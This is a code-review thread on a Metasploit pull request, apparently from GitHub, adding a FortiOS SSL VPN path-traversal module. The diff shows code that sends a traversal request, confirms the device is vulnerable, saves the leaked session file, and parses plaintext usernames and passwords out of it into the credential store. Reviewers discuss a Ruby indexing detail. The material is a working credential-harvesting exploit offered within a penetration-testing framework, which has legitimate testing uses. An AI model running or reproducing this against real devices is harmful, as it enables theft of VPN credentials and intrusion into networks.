modules/auxiliary/scanner/http/fortios_vpnssl_traversal_leak.rb

```diff
@@ -0,0 +1,198 @@
+          'vars_get' => {
+            'lang' => payload
+          }
+        }
+      )
+    rescue StandardError => e
+      print_error(message(e.message.to_s))
+      return nil
+    end
+
+    unless response
+      print_error(message('No reply.'))
+      return nil
+    end
+
+    if response.code != 200
+      print_error(message('NOT vulnerable!'))
+      return nil
+    end
+
+    if response.body =~ /var fgt_lang/
+      print_good(message('Vulnerable!'))
+      report_vuln(
+        host: @ip_address,
+        name: name,
+        refs: references
+      )
+      return response.body if datastore['STORE_CRED'] == true
+    end
+
+    nil
+  end
+
+  def message(msg)
+    "#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}"
+  end
+
+  def parse_config(chunk)
+    chunk = chunk.split("\x00").reject(&:empty?)
+
+    return if chunk[1].nil? || chunk[2].nil?
+
+    {
+      ip: @ip_address,
+      port: datastore['RPORT'],
+      service_name: @proto,
+      user: chunk[1],
+      password: chunk[2]
+    }
+  end
+
+  def report_creds(creds)
+    creds.each do |cred|
+      cred = cred.gsub('"', '').gsub(/[{}:]/, '').split(', ')
+      cred = cred.map do |h|
+        h1, h2 = h.split('=>')
+        { h1 => h2 }
+      end
+      cred = cred.reduce(:merge)
+
+      cred = JSON.parse(cred.to_json)
+
+      next unless cred && (!cred['user'].blank? && !cred['password'].blank?)
+
+      service_data = {
+        address: cred['ip'],
+        port: cred['port'],
+        service_name: cred['service_name'],
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+      }
+
+      credential_data = {
+        origin_type: :service,
+        module_fullname: fullname,
+        username: cred['user'],
+        private_data: cred['password'],
+        private_type: :password
+      }.merge(service_data)
+
+      login_data = {
+        core: create_credential(credential_data),
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }.merge(service_data)
+
+      create_credential_login(login_data)
+    end
+  end
+
+  def run_host(ip)
+    @proto = (ssl ? 'https' : 'http')
+    @ip_address = ip
+
+    print_status(message('Trying to connect.'))
+    data = execute_request
+    if data.nil?
+      print_error(message('No data received.'))
+      return
+    end
+
+    loot_data = case datastore['DUMP_FORMAT']
+                when /ascii/
+                  data.gsub(/[^[:print:]]/, '.')
+                else
+                  data
+                end
+    loot_path = store_loot('', 'text/plain', @ip_address, loot_data, '', '')
+    print_good(message("File saved to #{loot_path}"))
+
+    return if data.length < 110
+
+    if data[73] == "\x01"
+      separator = data[72..73]
+    elsif data[105..109] == "\x00\x00\x00\x00\x01"
+      separator = data[104..109]
+    end
+    data = data.split(separator)
+
+    creds = []
+    data.each_with_index do |chunk, index|
+      next unless index.positive?
```

Comment:
I thought the index with `each_with_index` would always be positive so I'm not sure when this code would be hit?

Reply:
Oh my bad I guess this was to avoid running on index 0? Here is what I got from my tests:

```
2.7.2 :009 > arrz.each_with_index do |chunk, index|
2.7.2 :010 >   puts index.positive?
2.7.2 :011 > end
false
true
true
true
true
true
true
 => ["a", "b", "c", "d", "e", "f", "g"] 
2.7.2 :012 > 
```

Reply:
Alright yeah this makes sense now, marking this as resolved, misunderstanding on my part.